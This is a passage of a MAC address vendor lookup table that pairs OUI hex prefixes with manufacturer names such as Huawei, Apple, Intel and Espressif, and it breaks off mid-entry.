A8DE68 Beijing Wide Technology Co.,Ltd 40F8DF CANON INC. 0C7FED IEEE Registration Authority 7C67AB Roku, Inc F43BD8 Intel Corporate A0889D Huawei Device Co., Ltd. 98D742 Samsung Electronics Co.,Ltd 6C302A Texas Instruments 7446B3 Texas Instruments 303F5D PT HAN SUNG ELECTORONICS INDONESIA 806D97 Private 3C69D1 ADC Automotive Distance Control System GmbH A490CE vivo Mobile Communication Co., Ltd. 18B185 Qiao Information Technology (Zhengzhou) Co., Ltd. 54A9C8 Home Control Singapore Pte Ltd 0C975F Aruba, a Hewlett Packard Enterprise Company A0B765 Espressif Inc. CCDBA7 Espressif Inc. C86C20 Sichuan Tianyi Comheart Telecom Co.,LTD 7C0C92 Suzhou Mobydata Smart System Co.,Ltd. 343A20 Aruba, a Hewlett Packard Enterprise Company F46ADD Liteon Technology Corporation 18E91D HUAWEI TECHNOLOGIES CO.,LTD 48706F HUAWEI TECHNOLOGIES CO.,LTD 04BAD6 D-Link Corporation B0FBDD Shenzhen SuperElectron Technology Co.,Ltd. E09C8D Seakeeper, Inc. 307F10 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 60FCF1 Private E8F791 Xiaomi Communications Co Ltd D0497C OnePlus Technology (Shenzhen) Co., Ltd AC2929 Infinix mobility limited 70662A Sony Interactive Entertainment Inc. DC71DD AX Technologies 2064DE Sunitec Enterprise Co.,Ltd A40F98 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 34AC11 China Mobile Group Device Co.,Ltd. 4432C2 GOAL Co., Ltd. 6C976D Motorola Mobility LLC, a Lenovo Company 6411A4 Motorola Mobility LLC, a Lenovo Company E83A4B China Mobile Group Device Co.,Ltd. 60E9AA CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. 240F5E Shenzhen z-router Technology Co., Ltd 74D4DD Quanta Computer Inc. 000EDB XiNCOM Corp. 40D95A AMPAK Technology,Inc. 4CD0DD HUAWEI TECHNOLOGIES CO.,LTD E4902A HUAWEI TECHNOLOGIES CO.,LTD 905E44 HUAWEI TECHNOLOGIES CO.,LTD 000C06 Nixvue Systems Pte Ltd 78669D Hui Zhou Gaoshengda Technology Co.,LTD 48468D Zepcam B.V. 904992 YSTen Technology Co.,Ltd 3CCE0D Shenzhen juduoping Technology Co.,Ltd 18863A DIGITAL ART SYSTEM C8D6B7 Solidigm Technology F0877F Magnetar Technology Shenzhen Co., LTD. 5CFB3A CHONGQING FUGUI ELECTRONICS CO.,LTD. D04E50 Mobiwire Mobiles (NingBo) Co., LTD F46C68 Wistron Neweb Corporation 8493B2 zte corporation 10F068 Ruckus Wireless 18FD74 Routerboard.com 74B725 Huawei Device Co., Ltd. 408EDF Huawei Device Co., Ltd. D880DC Huawei Device Co., Ltd. E8B3EF Fiberhome Telecommunication Technologies Co.,LTD B49F4D Fiberhome Telecommunication Technologies Co.,LTD 0C7FB2 ARRIS Group, Inc. 50392F INGRAM MICRO SERVICES FC8417 Honor Device Co., Ltd. 2CA79E HUAWEI TECHNOLOGIES CO.,LTD 102407 HUAWEI TECHNOLOGIES CO.,LTD 7CE152 THE GOODYEAR TIRE & RUBBER COMPANY EC2125 Toshiba Corp. 28CDC1 Raspberry Pi Trading Ltd 7820BD Polysense (Beijing) Technologies Co. Ltd 50E636 AVM Audiovisuelles Marketing und Computersysteme GmbH 684E05 HUNAN FN-LINK TECHNOLOGY LIMITED ACB566 Renesas Electronics (Penang) Sdn. Bhd. 68CE4E L-3 Communications Infrared Products 00E5F1 BUFFALO.INC 34EE2A ConMet F04DD4 Sagemcom Broadband SAS 381F26 IEEE Registration Authority 0499BB Apple, Inc. 5C1BF4 Apple, Inc. A851AB Apple, Inc. 3043D7 IEEE Registration Authority B4A7C6 SERVERCOM (INDIA) PRIVATE LIMITED 80C3BA Sonova Consumer Hearing GmbH 487E48 Earda Technologies co Ltd 286B35 Intel Corporate A4F933 Intel Corporate 10F60A Intel Corporate 70D823 Intel Corporate 3C4645 Shanghai Infinity Wireless Technologies Co.,Ltd. 30045C Shenzhen SuperElectron Technology Co.,Ltd. 9079CF zte corporation E84DEC Xerox Corporation C8B82F eero inc. FCA05A Oray.com co., LTD. 90486C Ring LLC C0EE40 Laird Connectivity 888FA4 Huawei Device Co., Ltd. 5068AC Huawei Device Co., Ltd. 8C1E80 Cisco Systems, Inc A41EE1 Taicang T&W Electronics E8FB1C AzureWave Technology Inc. 74D9EB Petabit Scale, Inc. C4DEE2 Espressif Inc. 68B6B3 Espressif Inc. 4035E6 Samsung Electronics Co.,Ltd D0A46F China Dragon Technology Limited 2C60CD NR ELECTRIC CO., LTD 1054D2 IEEE Registration Authority 6C8D77 Cisco Systems, Inc 7411B2 Cisco Systems, Inc 04E69E ZHONGGUANCUN XINHAIZEYOU TECHNOLOGY CO.,LTD 0417B6 Smart Innovation LLC 7C8AC0 EVBox BV AC80AE Fiberhome Telecommunication Technologies Co.,LTD CC60C8 Microsoft Corporation 00405F AFE COMPUTERS LTD. 00EBD8 MERCUSYS TECHNOLOGIES CO., LTD. D8365F Intelbras 0060E2 QUEST ENGINEERING & DEVELOPMENT C4DF39 Realme Chongqing Mobile Telecommunications Corp.,Ltd. 809733 Shenzhen Elebao Technology Co., Ltd 10634B SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 7404F1 Intel Corporate B85DC3 HUAWEI TECHNOLOGIES CO.,LTD B43AE2 HUAWEI TECHNOLOGIES CO.,LTD F0C8B5 HUAWEI TECHNOLOGIES CO.,LTD FC101A Palo Alto Networks 6CAEE3 Nokia 0CAC8A Sagemcom Broadband SAS 00A265 M2Motive Technology Inc. F46D2F TP-LINK TECHNOLOGIES CO.,LTD. 5478C9 AMPAK Technology,Inc. 2C301A Technicolor CH USA Inc for Telus E42B79 Nokia 1CF42B Huawei Device Co., Ltd. 6C51BF Huawei Device Co., Ltd. C814B4 Sichuan Tianyi Comheart Telecom Co.,LTD C049EF Espressif Inc. BC606B Shanghai Baud Data Communication Co.,Ltd. DCFE23 Murata Manufacturing Co., Ltd. 347379 xFusion Digital Technologies Co., Limited D83DCC shenzhen UDD Technologies,co.,Ltd D09200 FiRa Consortium 185E0B zte corporation D0BB61 zte corporation 60A6C5 HUAWEI TECHNOLOGIES CO.,LTD 208C86 HUAWEI TECHNOLOGIES CO.,LTD F0A951 HUAWEI TECHNOLOGIES CO.,LTD 94B555 Espressif Inc. 74F2FA Xiaomi Communications Co Ltd 5C843C Sony Interactive Entertainment Inc. E8AEC5 Arista Networks 4017F6 TKH SECURITY,S.L.U. ECE7A7 Intel Corporate 004058 UKG E893F3 Graphiant Inc 00198E Demant A/S 60FB00 SHENZHEN BILIAN ELECTRONIC CO.,LTD BCDF58 Google, Inc. 3CE9F7 Intel Corporate F4CE23 Intel Corporate A84FB1 Cisco Systems, Inc 7CC180 Apple, Inc. 280244 Apple, Inc. E85F02 Apple, Inc. E8C7CF Wistron Neweb Corporation CC5C61 Huawei Device Co., Ltd. 6CFFCE Sagemcom Broadband SAS C899B2 Arcadyan Corporation F4B898 Texas Instruments B0D278 Texas Instruments 54ACFC LIZN ApS 4C7274 Shenzhenshi Xinzhongxin Technology Co.Ltd 6425EC guangdong kesheng zhixun technology 800CF9 Amazon Technologies Inc. A09208 Tuya Smart Inc. A439B3 Beijing Xiaomi Mobile Software Co., Ltd AC7352 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 50C275 GN Audio A/S C8727E Nokia 0CB815 Espressif Inc. 588FCF Hangzhou Ezviz Software Co.,Ltd. 64D69A Intel Corporate 00E0CD SAAB SENSIS CORPORATION 0024B6 Seagate Technology 2887BA TP-Link Corporation Limited 3460F9 TP-Link Corporation Limited 7453A8 ACL Airshop BV E0A25A Shanghai Mo xiang Network Technology CO.,ltd E484D3 Xiaomi Communications Co Ltd 04106B Xiaomi Communications Co Ltd 04CCBC HUAWEI TECHNOLOGIES CO.,LTD 1CE504 HUAWEI TECHNOLOGIES CO.,LTD 605747 CIG SHANGHAI CO LTD F82551 Seiko Epson Corporation 2C0BAB HUAWEI TECHNOLOGIES CO.,LTD 94D2BC HUAWEI TECHNOLOGIES CO.,LTD 147EA1 Britania Eletrônicos S.A. E81656 Hangzhou BroadLink Technology Co.,Ltd E0D045 Intel Corporate 201F54 Raisecom Technology CO., LTD 7C97E1 Huawei Device Co., Ltd. C83E9E Huawei Device Co., Ltd. 684AE9 Samsung Electronics Co.,Ltd 60DD70 Apple, Inc. 98A5F9 Apple, Inc. ECA907 Apple, Inc. 940D2D Universal Electronics, Inc. A88C3E Microsoft Corporation 68BE49 Nebula Matrix 94F827 Shanghai Imilab Technology Co.Ltd 0CB789 Honor Device Co., Ltd. F0B040 HUNAN FN-LINK TECHNOLOGY LIMITED 482F6B Aruba, a Hewlett Packard Enterprise Company F863D9 ARRIS Group, Inc. A405D6 ARRIS Group, Inc. DCA633 ARRIS Group, Inc. D8CFBF Motorola Mobility LLC, a Lenovo Company 149E5D JSC "IB Reform" 70B8F6 Espressif Inc. 34CE69 Nokia Solutions and Networks GmbH & Co. KG 4C06B7 ProDVX Europe B.V. 1845B3 IEEE Registration Authority 14EBB6 TP-Link Corporation Limited 54AF97 TP-Link Corporation Limited 54CF8D HUAWEI TECHNOLOGIES CO.,LTD D48866 HUAWEI TECHNOLOGIES CO.,LTD D48457 GD Midea Air-Conditioning Equipment Co.,Ltd. FC0296 Xiaomi Communications Co Ltd 60E85B Texas Instruments E0720A Shenzhen SuperElectron Technology Co.,Ltd. 24D904 Sichuan Changhong Network Technologies Co., Ltd. 3C457A SKY UK LIMITED 483E5E SERNET (SUZHOU) TECHNOLOGIES CORPORATION 50EBF6 ASUSTek COMPUTER INC. C448FA Taicang T&W Electronics A89892 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD BC4760 Samsung Electronics Co.,Ltd 2C4DDE TECNO MOBILE LIMITED 303F7B Shenzhen YOUHUA Technology Co., Ltd 2804C6 Wanan Hongsheng Electronic Co.Ltd D47954 Huawei Device Co., Ltd. C839AC Huawei Device Co., Ltd. 145594 Huawei Device Co., Ltd. 08C06C Huawei Device Co., Ltd. C44F96 Alps Alpine 685811 Fiberhome Telecommunication Technologies Co.,LTD B4BA02 Agatel Ltd 60FF12 Samsung Electronics Co.,Ltd 24C613 Samsung Electronics Co.,Ltd 94E129 Samsung Electronics Co.,Ltd 84BA20 Silicon Laboratories 003C84 Silicon Laboratories 281D21 IN ONE SMART TECHNOLOGY(H,K,)LIMITED 74E336 FUJIAN STAR-NET COMMUNICATION CO.,LTD 902759 Nanjing Jiahao Technology Co., Ltd. 5C46B0 SIMCom Wireless Solutions Limited 3C219C Intel Corporate 389461 Renesas Electronics (Penang) Sdn. Bhd. 485519 Espressif Inc. F8FCE1 Amazon Technologies Inc. 6457E5 Beijing Royaltech Co.,Ltd FC9BD4 EdgeQ 145790 Qingdao Haier Technology Co.,Ltd 1859F5 Cisco Systems, Inc 703217 Intel Corporate 3498B5 NETGEAR C4345B HUAWEI TECHNOLOGIES CO.,LTD B0739C Amazon Technologies Inc. DC6294 Guangzhou Lango Electronics Technology Co.,Ltd. 9877CB Vorteks ED D45763 Apple, Inc. C02C5C Apple, Inc. EC4269 HMD Global Oy 180EAC SHENZHEN FAST TECHNOLOGIES CO.,LTD 144920 HUAWEI TECHNOLOGIES CO.,LTD DCA782 HUAWEI TECHNOLOGIES CO.,LTD 045170 Zhongshan K-mate General Electronics Co.,Ltd 384554 Harman/Becker Automotive Systems GmbH 88D82E Intel Corporate 50547B Nanjing Qinheng Microelectronics Co., Ltd. 28937D Sichuan Tianyi Comheart Telecom Co.,LTD D41AD1 Zyxel Communications Corporation B845F4 New H3C Technologies Co., Ltd EC01D5 Cisco Systems, Inc F829C0 Availink, Inc. 24B72A China Dragon Technology Limited 1C73E2 HUAWEI TECHNOLOGIES CO.,LTD 8C83E8 HUAWEI TECHNOLOGIES CO.,LTD 04D921 Occuspace 48B9C2 Teletics Inc. 90F3B8 China Mobile Group Device Co.,Ltd. 38563D Microsoft Corporation 34A5B4 NAVTECH PTE LTD E89F6D Espressif Inc. 405F7D TCT mobile ltd 4CEAAE GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 4C034F Intel Corporate 942957 Airpo Networks Technology Co.,Ltd. 986EE8 IEEE Registration Authority 08B49D TECNO MOBILE LIMITED D4C3B0 Gearlinx Pty Ltd E070EA HP Inc. C436C0 BUFFALO.INC B88A72 Renesas Electronics (Penang) Sdn. Bhd. 2C53D7 Sonova AG E8979A Quectel Wireless Solutions Co.,Ltd. 5CA6E6 TP-Link Corporation Limited B4B024 TP-Link Corporation Limited 18F22C TP-LINK TECHNOLOGIES CO.,LTD. 9897CC TP-LINK TECHNOLOGIES CO.,LTD. 043855 SCOPUS INTERNATIONAL-BELGIUM 88AC9E Shenzhen YOUHUA Technology Co., Ltd 9C36F8 Hyundai Kefico E0B72E ShenZhen Qualmesh Technology Co.,Ltd. 081605 Vodafone Italia S.p.A. 2CE032 TCL King Electrical Appliances(Huizhou)Co.,Ltd 2CB0FD Shenzhen MiaoMing Intelligent Technology Co.,Ltd C4FBC8 Shenzhen Candour Co., Ltd. 3CE4B0 Texas Instruments E80115 COOCAA Network Technology CO.,TD. 8CEA12 Shenzhen MiaoMing Intelligent Technology Co.,Ltd C8BD4D Samsung Electronics Co.,Ltd 2C15BF Samsung Electronics Co.,Ltd A0D2B1 Amazon Technologies Inc. 806D71 Amazon Technologies Inc. 1C53F9 Google, Inc. 04421A ASUSTek COMPUTER INC. 7463C2 Huawei Device Co., Ltd. D48FA2 Huawei Device Co., Ltd. 8881B9 Huawei Device Co., Ltd. 3C38F4 Sony Corporation 0CC413 Google, Inc. 207C14 Qotom B859CE Earda Technologies co Ltd 8C7AAA Apple, Inc. 000D4E NDR Co.,LTD. 409151 Espressif Inc. B0E9FE Woan Technology (Shenzhen) Co., Ltd. C89665 Microsoft Corporation 305696 Infinix mobility limited 7CB073 Realme Chongqing Mobile Telecommunications Corp.,Ltd. 00BD3E Vizio, Inc 0CE5A3 SharkNinja 34317F Panasonic Appliances Company 305F77 New H3C Technologies Co., Ltd 8C7A3D Xiaomi Communications Co Ltd CC3F8A KOMATSU LTD. 7C2499 Apple, Inc. 100020 Apple, Inc. 946424 Aruba, a Hewlett Packard Enterprise Company BC1E85 HUAWEI TECHNOLOGIES CO.,LTD B85600 HUAWEI TECHNOLOGIES CO.,LTD 987EE3 vivo Mobile Communication Co., Ltd. 04B86A SKY UK LIMITED 18F87F Wha Yu Industrial Co., Ltd. 10F605 Realme Chongqing Mobile Telecommunications Corp.,Ltd. 5C8F40 TECNO MOBILE LIMITED E0CB56 Shenzhen iComm Semiconductor CO.,LTD 40E1E4 Nokia Solutions and Networks GmbH & Co. KG 90F157 Garmin International FC5C45 Ruckus Wireless 20D778 Texas Instruments 4C2FD7 Huawei Device Co., Ltd. D47415 Huawei Device Co., Ltd. F4CE48 Extreme Networks, Inc. E446B0 Fujitsu Client Computing Limited 0899E8 KEMAS GmbH 54CE82 zte corporation 584849 IEEE Registration Authority E075AA Beijing Jingling Information System Technology Co., Ltd. 80CBBC Qingdao Intelligent&Precise Electronics Co.,Ltd. EC354D Wingtech Mobile Communications Co.,Ltd 7C3985 HUAWEI TECHNOLOGIES CO.,LTD 44AE44 Huawei Device Co., Ltd. 444F8E WiZ 2864EF Shenzhen Fsan Intelligent Technology Co.,Ltd 38FF13 Joint Stock Company "Research Instinite "Masshtab" D0DBB7 Casa Systems F02A2B IEEE Registration Authority 20BECD eero inc. 04ECD8 Intel Corporate 7CC255 Super Micro Computer, Inc. 0064AF Dish Technologies Corp 000534 Northstar Engineering Ltd. BC091B Intel Corporate 0026A7 CONNECT SRL 180712 Shenzhen Dazoo Technologies CO.,Ltd 001441 Innovation Sound Technology Co., LTD. B4ECFF Wuhan IPG Technologies Co., Ltd. F057A6 Intel Corporate 642677 BKM-Micronic Richtfunkanlagen GmbH 700777 OnTarget Technologies, Inc 60DD8E Intel Corporate 90593C AZ-TECHNOLOGY SDN BHD 1CC10C Intel Corporate F4A475 Intel Corporate C89E43 NETGEAR 00BFAF Hui Zhou Gaoshengda Technology Co.,LTD 8C1D96 Intel Corporate B4CDF5 CUB ELECPARTS INC. 6CCF39 Guangdong Starfive Technology Co., Ltd. 50586F Huawei Device Co., Ltd. F0B13F Huawei Device Co., Ltd. 1CE639 HUAWEI TECHNOLOGIES CO.,LTD 8C6794 vivo Mobile Communication Co., Ltd. D88C73 zte corporation E87865 Apple, Inc. A04ECF Apple, Inc. B8857B HUAWEI TECHNOLOGIES CO.,LTD 50D065 ESYLUX GmbH E4B503 Realme Chongqing Mobile Telecommunications Corp.,Ltd. ECF40C Cisco Systems, Inc 1006ED Cisco Systems, Inc C0D063 EM Microelectronic 7C10C9 ASUSTek COMPUTER INC. DCF56E Wellysis Corp. D4EB68 Cisco Systems, Inc C44D84 Cisco Systems, Inc 102CEF EMU Electronic AG 0091EB Renesas Electronics (Penang) Sdn. Bhd. E84FA7 Huawei Device Co., Ltd. 449F46 Huawei Device Co., Ltd. 345184 Huawei Device Co., Ltd. FCF77B Huawei Device Co., Ltd. 844709 Shenzhen IP3 Century Intelligent Technology CO.,Ltd 5CD06E Xiaomi Communications Co Ltd A8671E RATP 8CE9B4 Zhejiang Dahua Technology Co., Ltd. 08855B Kontron Europe GmbH 0887C7 Apple, Inc. 3865B2 Apple, Inc. D8DE3A Apple, Inc. 205383 HUAWEI TECHNOLOGIES CO.,LTD 4CD577 CHONGQING FUGUI ELECTRONICS CO.,LTD. 64ED57 ARRIS Group, Inc. EC08E5 Motorola Mobility LLC, a Lenovo Company 80CC9C NETGEAR 74E20C Amazon Technologies Inc. C0F9B0 HUAWEI TECHNOLOGIES CO.,LTD 148C4A HUAWEI TECHNOLOGIES CO.,LTD 609BB4 HUAWEI TECHNOLOGIES CO.,LTD 7C27BC Hui Zhou Gaoshengda Technology Co.,LTD 280FEB LG Innotek CC2D8C LG ELECTRONICS INC 507097 China Mobile Group Device Co.,Ltd. 105403 INTARSO GmbH 0C6046 vivo Mobile Communication Co., Ltd. CC1531 Intel Corporate C0FBF9 IEEE Registration Authority 2811A8 Intel Corporate 74CF00 Shenzhen SuperElectron Technology Co.,Ltd. 0C9A3C Intel Corporate DC2148 Intel Corporate 44DB60 Nanjing Baihezhengliu Technology Co., Ltd B8B77D Guangdong Transtek Medical Electronics CO.,Ltd C478A2 Huawei Device Co., Ltd. 9C9E71 Huawei Device Co., Ltd. ACE14F Autonomic Controls, Inc. AC976C Greenliant 2CEADC ASKEY COMPUTER CORP 9C5A81 Xiaomi Communications Co Ltd B81332 AMPAK Technology,Inc. 589153 China Mobile IOT Company Limited 68262A Sichuan Tianyi Comheart Telecom Co.,LTD B8224F Sichuan Tianyi Comheart Telecom Co.,LTD C8BD69 Samsung Electronics Co.,Ltd A87650 Samsung Electronics Co.,Ltd 54D17D Samsung Electronics Co.,Ltd 603AAF Samsung Electronics Co.,Ltd 643AB1 Sichuan Tianyi Comheart Telecom Co.,LTD 8048A5 Sichuan Tianyi Comheart Telecom Co.,LTD 44BA46 Sichuan Tianyi Comheart Telecom Co.,LTD 9C32A9 Sichuan Tianyi Comheart Telecom Co.,LTD 908674 Sichuan Tianyi Comheart Telecom Co.,LTD C0238D Samsung Electronics Co.,Ltd 745D68 Fiberhome Telecommunication Technologies Co.,LTD 987DDD China Mobile Group Device Co.,Ltd. 20CFAE Cisco Systems, Inc 98499F Domo Tactical Communications 00E5E4 Sichuan Tianyi Comheart Telecom Co.,LTD 1469A2 Sichuan Tianyi Comheart Telecom Co.,LTD 046B25 Sichuan Tianyi Comheart Telecom Co.,LTD 1012B4 Sichuan Tianyi Comheart Telecom Co.,LTD 88C9B3 IEEE Registration Authority 5813D3 Gemtek Technology Co., Ltd. 206A94 Hitron Technologies. Inc 309587 HUNAN FN-LINK TECHNOLOGY LIMITED 20CE2A IEEE Registration Authority 7CF666 Tuya Smart Inc. 102D41 Sichuan AI-Link Technology Co., Ltd. F889D2 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. 1027F5 TP-Link Corporation Limited ECB970 Ruijie Networks Co.,LTD 308398 Espressif Inc. C04B13 WonderSound Technology Co., Ltd 9C7F81 SHENZHEN FAST TECHNOLOGIES CO.,LTD 642753 Huawei Device Co., Ltd. 28534E HUAWEI TECHNOLOGIES CO.,LTD 5CB00A HUAWEI TECHNOLOGIES CO.,LTD C4BCD7 New Ryatek C0AEFD Shenzhen HC-WLAN Technology Co.,Ltd DC87CB Beijing Perfectek Technologies Co., Ltd. 201E88 Intel Corporate F40228 SAMSUNG ELECTRO-MECHANICS(THAILAND) 0C83CC Alpha Networks Inc. C8B6FE Fitbit, Inc. 187CAA China Mobile Group Device Co.,Ltd. A44C62 Hangzhou Microimage Software Co., Ltd 40BEEE Shenzhen Yunding Information Technology Co.,Ltd 001CC5 3Com Ltd E84F25 Murata Manufacturing Co., Ltd. 0425E0 Taicang T&W Electronics 385247 Huawei Device Co., Ltd. C0DCD7 Huawei Device Co., Ltd. 14CB19 HP Inc. 3037B3 HUAWEI TECHNOLOGIES CO.,LTD 3085EB Fiberhome Telecommunication Technologies Co.,LTD 8406FA Fiberhome Telecommunication Technologies Co.,LTD B8D43E vivo Mobile Communication Co., Ltd. 50C2ED GN Audio A/S 90A822 Amazon Technologies Inc. 0C5CB5 IEEE Registration Authority 74AD98 Cisco Systems, Inc 741575 Xiaomi Communications Co Ltd 848C8D Apple, Inc. 0CE441 Apple, Inc. B82AA9 Apple, Inc. 7864C0 Apple, Inc. E81CD8 Apple, Inc. 3C0630 Apple, Inc. 047BCB Universal Global Scientific Industrial Co., Ltd. E44164 Nokia 0881B2 Logitech (China) Technology Co., Ltd C4F174 eero inc. 28D0EA Intel Corporate E00CE5 HUAWEI TECHNOLOGIES CO.,LTD D4475A ScreenBeam, Inc. 78A6A0 Hangzhou Ezviz Software Co.,Ltd. F46B8C Hon Hai Precision Industry Co., Ltd. FC3497 ASUSTek COMPUTER INC. 847AB6 AltoBeam (China) Inc. 245DFC IEEE Registration Authority 00C06A Zahner-Elektrik Ingeborg Zahner-Schiller GmbH & Co. KG. 8C4361 Hailo Digital Hub GmbH & Co. KG AC139C Adtran Inc A4CEDA Arcadyan Corporation 34E9FE Metis Co., Ltd. 7C55A7 Kastle Systems FCE806 Edifier International 3078D3 Virgilant Technologies Ltd. 0017E8 Texas Instruments E8EA4D HUAWEI TECHNOLOGIES CO.,LTD 3CFFD8 HUAWEI TECHNOLOGIES CO.,LTD 4851CF Intelbras 4C5D3C Cisco Systems, Inc 34732D Cisco Systems, Inc 8C3446 Huawei Device Co., Ltd. 804786 Samsung Electronics Co.,Ltd 4C617E Huawei Device Co., Ltd. E0E37C Huawei Device Co., Ltd. 2418C6 HUNAN FN-LINK TECHNOLOGY LIMITED 649714 eero inc. B4107B Texas Instruments CC86EC Silicon Laboratories 9C8281 vivo Mobile Communication Co., Ltd. 98C3D2 Ningbo Sanxing Medical Electric Co.,Ltd D8ECE5 Zyxel Communications Corporation C470AB Ruijie Networks Co.,LTD CC6B1E CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. F0D08C TCT mobile ltd E0E8BB Unicom Vsens Telecommunications Co., Ltd. 982782 IEEE Registration Authority FC4009 zte corporation 24A65E zte corporation 509839 Xiaomi Communications Co Ltd CC812A vivo Mobile Communication Co., Ltd. 7C1B93 Huawei Device Co., Ltd. 2841EC HUAWEI TECHNOLOGIES CO.,LTD 7C004D HUAWEI TECHNOLOGIES CO.,LTD 1C9957 Intel Corporate 04D320 ITEL MOBILE LIMITED E4C90B Radwin 70DFF7 ARRIS Group, Inc. 041119 IEEE Registration Authority 38A067 Nokia Solutions and Networks GmbH & Co. KG 18A6F7 TP-LINK TECHNOLOGIES CO.,LTD. DC2D3C Huawei Device Co., Ltd. E455A8 Cisco Meraki 30F94B Universal Electronics, Inc. 34C103 Hangzhou Huamu Technology Co.,Ltd. 00DCB2 Extreme Networks, Inc. 6C13D5 Cisco Systems, Inc F0F564 Samsung Electronics Co.,Ltd 708976 Tuya Smart Inc. 245B83 Renesas Electronics (Penang) Sdn. Bhd. F06F46 Ubiik 68ABBC Beijing Xiaomi Mobile Software Co., Ltd FC041C GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 003DE1 Huawei Device Co., Ltd. 5CC336 ittim 6407F6 Samsung Electronics Co.,Ltd B06088 Intel Corporate 6413AB HUAWEI TECHNOLOGIES CO.,LTD 0C7329 Sercomm Corporation. 48007D DTS ELEKTRONIK SAN. TIC. LTD. STI. 30B1B5 Arcadyan Corporation F4D488 Apple, Inc. 682F67 Apple, Inc. 50ED3C Apple, Inc. 5466F9 ConMet 8C64D4 Hyeco Smart Tech Co.,Ltd 8444AF Zhejiang Tmall Technology Co., Ltd. 8CDEF9 Beijing Xiaomi Mobile Software Co., Ltd 14230A HUAWEI TECHNOLOGIES CO.,LTD 58AEA8 HUAWEI TECHNOLOGIES CO.,LTD 6CD704 HUAWEI TECHNOLOGIES CO.,LTD 543AD6 Samsung Electronics Co.,Ltd 544617 zte corporation F0ACA4 HBC-radiomatic 64D7C0 Huawei Device Co., Ltd. 946010 Huawei Device Co., Ltd. D814DF TCL King Electrical Appliances (Huizhou) Co., Ltd 90027A Shenzhen Sworix Techonlogy Co., Ltd D05AFD Realme Chongqing Mobile Telecommunications Corp.,Ltd. 70E46E Lytx 58AE2B Huawei Device Co., Ltd. F89725 OPPLE LIGHTING CO., LTD 584120 TP-LINK TECHNOLOGIES CO.,LTD. 3C06A7 TP-LINK TECHNOLOGIES CO.,LTD. 24E927 TomTom International BV 6C02E0 HP Inc. 5C85F8 SHENZHEN KAIFA TECHNOLOGY CO.,LTD. 9CBCF0 Xiaomi Communications Co Ltd E43C80 University of Oklahoma 0C4885 LG Electronics (Mobile Communications) 845CF3 Intel Corporate 2C793D Boditech Med D03C1F Intel Corporate A03D6E Cisco Systems, Inc B08BD0 Cisco Systems, Inc 000BDE TELDIX GmbH A46BB6 Intel Corporate 903CB3 Edgecore Networks Corporation 802278 China Mobile IOT Company Limited FC0C45 Shenzhen SuperElectron Technology Co.,Ltd. 5467E6 SHENZHEN MTC CO LTD 74E9BF HUAWEI TECHNOLOGIES CO.,LTD A8F766 ITE Tech Inc 7C210D Cisco Systems, Inc 34FEC5 Shenzhen Sunwoda intelligent hardware Co.,Ltd 84F147 Cisco Systems, Inc 94A67E NETGEAR FCD436 Motorola Mobility LLC, a Lenovo Company 0CEC8D Motorola Mobility LLC, a Lenovo Company 184F5D JRC Mobility Inc. F023AE AMPAK Technology,Inc. 08CBE5 R3 Solutions GmbH 482567 Poly 8C3401 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD D8109F HUAWEI TECHNOLOGIES CO.,LTD 3C5447 HUAWEI TECHNOLOGIES CO.,LTD 006B6F HUAWEI TECHNOLOGIES CO.,LTD 14B2E5 Shenzhen iComm Semiconductor CO.,LTD D439B8 Ciena Corporation 103F44 Xiaomi Communications Co Ltd E07726 Huawei Device Co., Ltd. 249F89 Texas Instruments 247625 Texas Instruments F87A41 Cisco Systems, Inc A89AD7 Nokia 181171 Guangzhou Doctorpai Education & Technology Co.,Ltd 603573 Earda Technologies co Ltd A49733 ASKEY COMPUTER CORP F02F74 ASUSTek COMPUTER INC. 006E02 Xovis AG 2C1875 Skyworth Digital Technology(Shenzhen) Co.,Ltd D06EDE Sagemcom Broadband SAS 3CA37E HUAWEI TECHNOLOGIES CO.,LTD 7898E8 D-Link International 7891E9 Raisecom Technology CO.,LTD 0034A1 RF-LAMBDA USA INC. 249494 Hong Kong Bouffalo Lab Limited 30BE3B Mitsubishi Electric Corporation F8E43B ASIX Electronics Corporation 60DB98 Calix Inc. 6872C3 Samsung Electronics Co.,Ltd 70B13D Samsung Electronics Co.,Ltd FC7FF1 Aruba, a Hewlett Packard Enterprise Company F85EA0 Intel Corporate 44F21B Apple, Inc. 74650C Apple, Inc. E06D17 Apple, Inc. F0B3EC Apple, Inc. F465A6 Apple, Inc. 00E93A AzureWave Technology Inc. ACF85C Chengdu Higon Integrated Circuit Design Co,. Ltd. 78F09B Huawei Device Co., Ltd. 48EF61 Huawei Device Co., Ltd. 00188C Mobile Action Technology Inc. 1C90BE Ericsson AB 342B70 Arris 4C0220 Xiaomi Communications Co Ltd D41B81 CHONGQING FUGUI ELECTRONICS CO.,LTD. F40B9F CIG SHANGHAI CO LTD A07751 ASMedia Technology Inc. 305684 SHENZHEN YUNJI INTELLIGENT TECHNOLOGY CO.,LTD 5C6199 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. E8DB84 Espressif Inc. 00081E Repeatit AB C094AD zte corporation D021AC Yohana 7845B3 Huawei Device Co., Ltd. 20DCFD Huawei Device Co., Ltd. FC65B3 Huawei Device Co., Ltd. 109D7A Huawei Device Co., Ltd. DC6373 OBARA KOREA D47EE4 China Mobile IOT Company Limited 74731D ifm electronic gmbh 001F94 Lascar Electronics Ltd 787DF3 Sterlite Technologies Limited 38FC98 Intel Corporate 14563A Huawei Device Co., Ltd. 7090B7 Huawei Device Co., Ltd. D05509 Nintendo Co.,Ltd 9CB2E8 HUAWEI TECHNOLOGIES CO.,LTD 502F9B Intel Corporate 84EA97 Shenzhen iComm Semiconductor CO.,LTD A47D9F Shenzhen iComm Semiconductor CO.,LTD E01CFC D-Link International 38CA73 Shenzhen MiaoMing Intelligent Technology Co.,Ltd 6C0DC4 Beijing Xiaomi Electronics Co., Ltd. C440F6 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 204EF6 